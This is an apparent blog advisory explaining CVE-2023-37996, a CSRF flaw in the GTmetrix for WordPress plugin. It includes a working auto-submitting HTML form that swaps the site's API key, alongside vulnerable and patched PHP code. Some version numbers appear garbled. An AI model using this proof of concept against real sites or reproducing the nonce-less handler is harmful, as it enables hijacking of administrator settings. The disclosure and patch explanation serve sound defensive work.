CVE-2023-37996 - How a CSRF Vulnerability in GTmetrix for WordPress <= .4.7 Can Be Exploited

CVE-2023-37996 is a recently discovered security vulnerability affecting the *GTmetrix for WordPress plugin* up to and including version .4.7. The flaw lies in how the plugin processes user actions, opening the door for a type of attack known as Cross-Site Request Forgery (CSRF). This article dives into what this means, how it works, and exactly what a real exploit might look like—all in simple terms, with example code and links to references.

What Is CSRF?

CSRF, or Cross-Site Request Forgery, is a sneaky kind of web attack where a hacker tricks a logged-in user into performing unwanted actions on a website. Imagine being logged in to your WordPress admin, clicking a harmless-looking link, and—without knowing—changing some key settings or performing administrative actions. That’s CSRF in action.

How GTmetrix for WordPress Got It Wrong

The GTmetrix for WordPress plugin lets site admins check site performance with GTmetrix. Normally, when users perform sensitive actions (like setting an API key or triggering reports), they should include a special WordPress security “nonce”—basically, a tiny fail-safe to block CSRF.

Early versions of GTmetrix for WordPress (<= .4.7) failed to correctly check nonces for some admin actions, such as saving settings. This loophole allows attackers to create requests that look legitimate to the WordPress server, but are actually coming from somewhere else.

Proof of Exploit: CSRF in Action

Let’s look at a simple scenario: the plugin provides a page at /wp-admin/options-general.php?page=gtmetrix, where admins set their GTmetrix API keys.

Suppose GTmetrix for WordPress doesn't check for a valid nonce. An attacker could create a simple HTML page like this:

<!-- evil-csrf.html -->
<html>
  <body>
    <h2>You won a free iPhone! Click here!</h2>
    <form id="csrfForm" action="https://victim-site.com/wp-admin/options-general.php?page=gtmetrix"; method="POST">
      <input type="hidden" name="gtmetrix_apikey" value="attacker-key" />
      <input type="hidden" name="action" value="save" />
    </form>
    <script>
      document.getElementById('csrfForm').submit();
    </script>
  </body>
</html>

Now, if an unsuspecting admin is logged in to their WordPress dashboard and visits this evil page, their browser will quietly submit this form, changing the site's GTmetrix integration to use the attacker’s API key!

Why Does This Matter?

- Site Data Leak: With control over the GTmetrix API key, attackers might gather sensitive data about your site’s performance stats and even conduct Denial of Service by exceeding GTmetrix API limits.
- Backdoor: Attackers could trick admins into changing other settings or even opening up more dangerous actions, depending on what the plugin allows.

How Was It Fixed?

The plugin author patched the issue promptly in version .4.8 by adding proper WordPress check_admin_referer() calls—these are standard nonce checks in WordPress plugin development.

Old code (vulnerable, no nonce)

// In plugin's settings handler
if ($_POST['action'] == 'save') {
    update_option('gtmetrix_apikey', sanitize_text_field($_POST['gtmetrix_apikey']));
    // ... more actions ...
}

Fixed code (with nonce)

if ($_POST['action'] == 'save') {
    check_admin_referer('gtmetrix_settings');
    update_option('gtmetrix_apikey', sanitize_text_field($_POST['gtmetrix_apikey']));
    // ... more actions ...
}

Now, any request to change plugin settings must include a valid nonce, stopping CSRF attacks cold.

How to Protect Yourself

- Update Now: If you use *GTmetrix for WordPress*, update to the *latest version* immediately—download here.
- Review Plugins: Check that your plugins follow WordPress coding standards, especially for admin actions.
- Educate Users: Remind admins never to click unknown links or visit unfamiliar websites while logged into admin areas.

Official References

- Original Vulnerability Disclosure on WPScan
- GTmetrix for WordPress Plugin Changelog
- WordPress CSRF Explainer

In Summary

CVE-2023-37996 was a textbook example of why even small plugins must follow proper WordPress coding practices. CSRF flaws can be silent and deadly, letting anyone with basic web skills compromise your website by tricking your admins through social engineering.

Always keep plugins updated, and be wary of third-party content while signed in as an admin.


*Secure your WordPress site. Stay aware. Stay updated!*

Timeline

Published on: 10/03/2023 10:15:10 UTC
Last modified on: 10/04/2023 17:13:22 UTC